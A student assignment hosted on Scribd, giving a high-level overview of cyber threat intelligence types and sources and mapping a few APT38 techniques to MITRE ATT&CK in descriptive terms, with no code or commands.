KEMBAR78
Threat Hunting Assignment Formatted | PDF | Security | Computer Security
Scribd
Upload
27 views4 pages

Threat Hunting Assignment Formatted

The document provides an overview of Cyber Threat Intelligence (CTI), emphasizing its importance in modern cybersecurity for proactive threat detection and incident response. It outlines various types of CTI, sources of intelligence, and introduces the MITRE ATT&CK framework, which helps map adversary behaviors for effective threat hunting. The report also discusses the techniques used by the APT38 group, highlighting the significance of CTI in enhancing organizational defenses against cyber threats.

Uploaded by

thundernk1
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
27 views4 pages

Threat Hunting Assignment Formatted

The document provides an overview of Cyber Threat Intelligence (CTI), emphasizing its importance in modern cybersecurity for proactive threat detection and incident response. It outlines various types of CTI, sources of intelligence, and introduces the MITRE ATT&CK framework, which helps map adversary behaviors for effective threat hunting. The report also discusses the techniques used by the APT38 group, highlighting the significance of CTI in enhancing organizational defenses against cyber threats.

Uploaded by

thundernk1
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 4

Threat Hunting – Assignment 2

Nitesh Kumar B S

22BTCS134

B.Tech – Cyber Security

Garden City University


Cyber Threat Intelligence and Threat Hunting Report

Part 1: Understanding Cyber Threat Intelligence (CTI)

Definition of Cyber Threat Intelligence


Cyber Threat Intelligence (CTI) is the collection, evaluation, and analysis of information
about potential or current threats targeting an organization’s digital infrastructure. CTI
transforms raw data into actionable insights to support decision-making in cybersecurity
operations and defenses.

Importance of CTI in Modern Cybersecurity


In today’s complex digital environment, threats evolve rapidly. CTI plays a crucial role by:
- Enhancing proactive threat detection
- Guiding incident response and mitigation
- Informing security strategies and investments
- Improving the effectiveness of security tools like SIEM and IDS
- Helping anticipate attacker behavior based on prior patterns

Types of Threat Intelligence


Type Description Real-World Example

Strategic High-level, long-term A 2022 WEF report showed


analysis focused on trends increased cyber risk in
and risk to inform executive healthcare. A German
decisions. hospital chain used this to
increase cybersecurity
budgets.

Tactical Focuses on tactics, The U.S. Energy Department


techniques, and procedures detected spear-phishing
(TTPs) used by attackers. using APT29 tactics during
election season.

Operational Near real-time intelligence FireEye observed and


about ongoing attacks and shared indicators during
threat actor infrastructure. the SolarWinds breach.

Technical Low-level data such as IPs, A bank detected Emotet


file hashes, and domains. malware using shared IOCs
from VirusTotal and
ThreatConnect.
Part 2: CTI Sources
Here are five primary sources of Cyber Threat Intelligence along with their reliability and
challenges:

Source Explanation Reliability Challenges

OSINT Publicly available Varies Risk of false or


data from blogs, outdated data
GitHub, forums, etc.

SIGINT Interception of High Legal and ethical


signals and issues
communication
data.

Dark Web Threat intelligence Medium–High Difficult to access


Monitoring from hacker forums and verify
and marketplaces.

Internal Logs Includes firewall, High Volume and


DNS, and system complexity of data
logs.

Vendor Threat From platforms like High Subscription cost;


Feeds IBM X-Force or may miss niche
FireEye. threats

Part 3: MITRE ATT&CK Framework

Introduction to MITRE ATT&CK


MITRE ATT&CK is a globally accessible knowledge base of adversary behavior based on
real-world observations. It helps defenders map TTPs and respond effectively to cyber
threats.

Purpose in Threat Hunting and Incident Response


- Mapping known behaviors to detection tools (SIEM, EDR)
- Prioritizing threats based on attacker techniques
- Enhancing blue team operations
- Supporting hypothesis-driven threat hunts

Chosen APT Group: APT38 (Lazarus Subset)


APT38 is a North Korean group specializing in financial cybercrime, particularly via SWIFT
banking systems. Their TTPs include:

- Spear-phishing for initial access


- Use of custom RATs for execution
- Credential dumping
- Data exfiltration via C2 channels

Mapped Techniques from MITRE ATT&CK


Tactic Technique Description

Execution T1059 – Command Line APT38 uses PowerShell and


Interface CMD scripts for remote
command execution.

Persistence T1547.001 – Registry Run Malware embedded into


Keys registry keys for
persistence.

Exfiltration T1041 – Exfiltration Over Data sent over encrypted C2


C2 Channel connections.

Conclusion
Cyber Threat Intelligence is critical for modern cybersecurity. When combined with
frameworks like MITRE ATT&CK, CTI enables organizations to proactively defend and
respond to threats. Real-world applications show how threat hunting evolves with
adversarial tactics.

You might also like